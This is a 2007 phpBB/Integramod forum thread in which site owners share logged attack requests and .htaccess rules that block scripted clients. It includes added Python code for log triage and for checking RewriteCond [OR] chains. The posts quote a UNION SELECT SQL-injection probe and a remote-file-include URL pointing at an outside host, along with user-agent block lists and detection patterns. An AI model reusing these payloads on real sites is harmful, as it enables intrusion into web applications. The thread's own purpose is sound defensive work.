Security Logs with Hacker IP's

This is where you'll find security-related information.
Discuss Integramod/phpBB security issues here.

Moderator: Integra Moderator

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Sat Aug 18, 2007 6:25 pm

We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...


Using rewrite, it kills the tool that is hitting me in about 85% of the attacks. This makes the log smaller, so if you try it, set it up to process the rewrite first, then the URLs. It could help speed things up a bit (this file is processed on every request, I believe) and make a little less work with the logs for you.

Just a thought.

Re: Security Logs with Hacker IP's

PostAuthor: Omni-Lee » Wed Nov 28, 2007 8:46 pm

Checking the log file I found this little number:

Code: Select all
/forum/links.php?t=search&search_keywords=asd&start=1,1+and+1=2+union+select+0x2D4578372D31,0x2D4578372D32,0x2D4578372D33,0x2D4578372D34,0x2D4578372D35,0x2D4578372D36,0x2D4578372D37,0x2D4578372D38,0x2D4578372D39,0x2D4578372D3130,0x2D4578372D3131,0x2D4578372D3132,0x2D4578372D3133,0x2D4578372D3134,0x2D4578372D3135,0x2D4578372D3136,0x2D4578372D3137,0x2D4578372D3138,0x2D4578372D3139,0x2D4578372D3230,0x2D4578372D3231,0x2D4578372D3232,0x2D4578372D3233,0x2D4578372D3234,0x2D4578372D3235,0x2D4578372D3236,0x2D4578372D3237,0x2D4578372D3238,0x2D4578372D3239,0x2D4578372D3330,0x2D4578372D3331,0x2D4578372D3332,0x2D4578372D3333,0x2D4578372D3334,0x2D4578372D3335,0x2D4578372D3336,0x2D4578372D3337,0x2D4578372D3338,0x2D4578372D3339,0x2D4578372D3430,0x2D4578372D3431,0x2D4578372D3432,0x2D4578372D3433,0x2D4578372D3434,0x2D4578372D3435,0x2D4578372D3436,0x2D4578372D3437,0x2D4578372D3438,0x2D4578372D3439,0x2D4578372D3530/*


What the heck is it?

Btw, what is that Rewrite in .htaccess? Can it be used for attacks like what I posted above?
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Thu Nov 29, 2007 7:07 am

Post the full attack like this:

forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm

and if I have a .htaccess rule I'll post it. The attack type is in that URL: "union+select".
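The two kinds of log entry quoted above can be triaged automatically. This is an added example, not code from the thread or from Integramod: it labels each request and decodes the `0x...` literals in the `union+select` entry, which turn out to be numbered marker strings (one per column). The sample entries are constructed (the first is shortened from the entry quoted above; `attacker.example` is a placeholder host), and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample entries: (request, user agent) pairs. The first is a
# shortened copy of the thread's entry; the host in the second is a placeholder.
SAMPLE_LOG = [
    ("/forum/links.php?t=search&search_keywords=asd&start=1,1+and+1=2+union+select+"
     "0x2D4578372D31,0x2D4578372D32,0x2D4578372D33/*", "Mozilla/4.0 (compatible)"),
    ("forum/viewforum.php?f=4&lofi=1//includes/functions_portal.php"
     "?phpbb_root_path=http://attacker.example/x.jpg?", "libwww-perl/5.79"),
    ("/forum/viewtopic.php?t=42", "Mozilla/5.0"),
]

UNION_RE = re.compile(r"\bunion\b.+?\bselect\b", re.I | re.S)  # UNION ... SELECT
REMOTE_RE = re.compile(r"=\s*(?:https?|ftp)://", re.I)         # param=http://...
HEX_RE = re.compile(r"\b0x((?:[0-9a-f]{2})+)", re.I)           # 0x2D45... literals

def decode_hex_literals(text):
    """Turn MySQL-style 0x.. literals into the strings they encode."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_RE.findall(text)]

def classify(request, user_agent):
    """Return (labels, decoded hex markers) for one logged request."""
    decoded = unquote_plus(request)  # '+' and %xx back to plain characters
    labels = []
    if UNION_RE.search(decoded):
        labels.append("sqli-union-select")
    if REMOTE_RE.search(decoded):
        labels.append("remote-file-include")
    if "libwww-perl" in user_agent.lower():
        labels.append("scripted-client")
    return labels, decode_hex_literals(decoded)

def triage(entries):
    """Keep only the entries that received at least one label."""
    results = []
    for request, user_agent in entries:
        labels, markers = classify(request, user_agent)
        if labels:
            results.append((request[:40], labels, markers))
    return results

if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(row)
```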

Re: Security Logs with Hacker IP's

PostAuthor: Omni-Lee » Thu Nov 29, 2007 10:29 am

I tried the RewriteCond code you supplied and I get 403 Access Denied. It was a direct copy and paste.

*Edit*: I found the problem, the [OR] can only be used when there is going to be another command (possibly of a similar type).

Code: Select all
    RewriteEngine On
    # testing user agent blocking
    RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
    RewriteCond %{HTTP_USER_AGENT} ai_archiver
    # end test
    RewriteRule ^.* - [F,L]
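The `[OR]` problem described in the post above can be caught before a rule set goes live. This is an added example, not code from the thread or from Apache: a simplified model of how a chain of `RewriteCond` lines combines, assuming every condition tests `%{HTTP_USER_AGENT}` and that an `[OR]` condition that fails simply hands over to the next line. `FIXED` is the posted rule set without its comments, `DANGLING` is a constructed variant, and the function names are hypothetical.

```python
import re

# The rule set from the post (comments omitted), one directive per line.
FIXED = """\
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} ai_archiver
RewriteRule ^.* - [F,L]
"""
# Constructed variant: [OR] left on the last condition before the rule.
DANGLING = FIXED.replace("ai_archiver\n", "ai_archiver [OR]\n")

def parse_conds(htaccess):
    """Return [(pattern, has_or_flag)] for the RewriteCond lines before the rule."""
    conds = []
    for line in htaccess.splitlines():
        parts = line.split()
        if parts and parts[0] == "RewriteRule":
            break
        if parts and parts[0] == "RewriteCond":
            flags = parts[3].strip("[]").upper().split(",") if len(parts) > 3 else []
            conds.append((parts[2], "OR" in flags))
    return conds

def dangling_or(htaccess):
    """Lint check: True if the last condition before the rule carries [OR]."""
    conds = parse_conds(htaccess)
    return bool(conds) and conds[-1][1]

def rule_fires(htaccess, user_agent):
    """Model of the condition chain: True means the [F] rule would apply."""
    conds = parse_conds(htaccess)
    i = 0
    while i < len(conds):
        pattern, or_next = conds[i]
        matched = re.search(pattern, user_agent) is not None
        if or_next:
            if matched:
                # One alternative matched: skip the rest of this OR group.
                while i < len(conds) and conds[i][1]:
                    i += 1
            # A failed [OR] condition just moves on to the next line.
        elif not matched:
            return False  # a plain (AND) condition failed
        i += 1
    return True  # nothing failed, including the case where nothing follows [OR]
```

In this model an ordinary browser passes `FIXED` but is refused under `DANGLING`, which matches the 403 reported in the post.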

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Thu Nov 29, 2007 11:53 am

That's correct. Did you check to see if that block will stop that?

Re: Security Logs with Hacker IP's

PostAuthor: Omni-Lee » Thu Nov 29, 2007 2:35 pm

I've been watching and the logs have been clean. What's totally nuts is I actually want to see an entry now, just so I can block it. Thanks for that bit of code. With the error, inadvertent as it was, I researched .htaccess commands and found ways to further secure my site. Specifically, hiding the .htaccess file from external requests. I never knew all the good things that could be done in .htaccess; it is a pretty powerful file.